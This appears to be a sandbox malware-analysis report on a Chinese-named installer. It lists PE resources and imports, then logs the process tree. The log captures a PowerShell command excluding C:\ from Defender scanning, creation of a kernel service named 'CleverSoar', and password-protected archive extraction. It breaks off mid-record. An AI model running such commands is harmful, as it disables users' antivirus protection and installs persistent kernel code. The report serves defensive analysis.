                                      RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
                                      RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
                                      RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
                                      RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
                                      RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
                                      RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
                                      RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
                                      RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
                                      RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
                                      RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
                                      RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
                                      RT_STRING | 0xd8e00 | 0x3f8 | data | | | 0.3198818897637795
                                      RT_STRING | 0xd91f8 | 0x2dc | data | | | 0.36475409836065575
                                      RT_STRING | 0xd94d4 | 0x430 | data | | | 0.40578358208955223
                                      RT_STRING | 0xd9904 | 0x44c | data | | | 0.38636363636363635
                                      RT_STRING | 0xd9d50 | 0x2d4 | data | | | 0.39226519337016574
                                      RT_STRING | 0xda024 | 0xb8 | data | | | 0.6467391304347826
                                      RT_STRING | 0xda0dc | 0x9c | data | | | 0.6410256410256411
                                      RT_STRING | 0xda178 | 0x374 | data | | | 0.4230769230769231
                                      RT_STRING | 0xda4ec | 0x398 | data | | | 0.3358695652173913
                                      RT_STRING | 0xda884 | 0x368 | data | | | 0.3795871559633027
                                      RT_STRING | 0xdabec | 0x2a4 | data | | | 0.4275147928994083
                                      RT_RCDATA | 0xdae90 | 0x10 | data | | | 1.5
                                      RT_RCDATA | 0xdaea0 | 0x310 | data | | | 0.6173469387755102
                                      RT_RCDATA | 0xdb1b0 | 0x2c | data | | | 1.1818181818181819
                                      RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
                                      RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2790368271954674
                                      RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                                      DLL | Import
                                      kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                      comctl32.dll | InitCommonControls
                                      user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                      oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                      advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                      Name | Ordinal | Address
                                      __dbk_fcall_wrapper | 2 | 0x40fc10
                                      dbkFCallWrapperAddr | 1 | 0x4b063c
                                      Language of compilation system | Country where language is spoken | Map
                                      English | United States |
                                      No network behavior found


                                      Target ID:0
                                      Start time:02:48:49
                                      Start date:23/12/2024
                                      Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe"
                                      Imagebase:0x240000
                                      File size:5'695'204 bytes
                                      MD5 hash:B7289FD08CD04C771FD7C9B06477601A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:02:48:49
                                      Start date:23/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-1N3P9.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$20452,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe"
                                      Imagebase:0x790000
                                      File size:3'366'912 bytes
                                      MD5 hash:CCFB5265302C0ED10D4EE3C9C00B07B1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:02:48:50
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):false
                                      Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                      Imagebase:0x7ff788560000
                                      File size:452'608 bytes
                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:02:48:50
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:02:48:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                      Imagebase:0x7ff693ab0000
                                      File size:496'640 bytes
                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      Target ID:5
                                      Start time:02:48:56
                                      Start date:23/12/2024
                                      Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
                                      Imagebase:0x240000
                                      File size:5'695'204 bytes
                                      MD5 hash:B7289FD08CD04C771FD7C9B06477601A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Reputation:low
                                      Has exited:false

                                      Target ID:6
                                      Start time:02:48:56
                                      Start date:23/12/2024
                                      Path:C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Local\Temp\is-BAUFA.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$2046A,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
                                      Imagebase:0x3d0000
                                      File size:3'366'912 bytes
                                      MD5 hash:CCFB5265302C0ED10D4EE3C9C00B07B1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:7
                                      Start time:02:48:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:02:48:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:9
                                      Start time:02:48:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:10
                                      Start time:02:48:59
                                      Start date:23/12/2024
                                      Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                      Wow64 process (32bit):true
                                      Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                      Imagebase:0x5a0000
                                      File size:831'200 bytes
                                      MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      • Detection: 0%, Virustotal
                                      Has exited:true

                                      Target ID:11
                                      Start time:02:48:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:12
                                      Start time:02:48:59
                                      Start date:23/12/2024
                                      Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                      Wow64 process (32bit):true
                                      Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                      Imagebase:0x5a0000
                                      File size:831'200 bytes
                                      MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:13
                                      Start time:02:48:59
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:14
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:15
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:16
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:17
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:18
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:19
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:20
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:21
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:22
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:23
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:24
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:25
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:26
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:27
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:28
                                      Start time:02:49:00
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:29
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:30
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:32
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:33
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:34
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:35
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:36
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:37
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:38
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:39
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:40
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:41
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:42
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:43
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:44
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:45
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:46
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:47
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff6cc220000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:48
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7a1730000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:49
                                      Start time:02:49:01
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
